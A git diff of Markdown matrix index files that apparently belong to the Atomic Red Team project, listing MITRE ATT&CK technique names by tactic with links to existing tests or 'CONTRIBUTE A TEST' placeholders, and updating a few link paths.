+| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Information Discovery](../../T1082/T1082.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Rc.common](../../T1037.004/T1037.004.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Startup Items](../../T1037.005/T1037.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Startup Items](../../T1037.005/T1037.005.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Rename System Utilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Rootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | | | [Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
@@ -52,9 +57,8 @@
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | | | [Timestomp](../../T1551.006/T1551.006.md) | | | | | | | |
+| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 08107404..3b3fd7c9 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -4,98 +4,108 @@
| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash](../../T1059.004/T1059.004.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Application Shimming](../../T1546.011/T1546.011.md) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | RDP Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Clear Command History](../../T1551.003/T1551.003.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1551.001/T1551.001.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
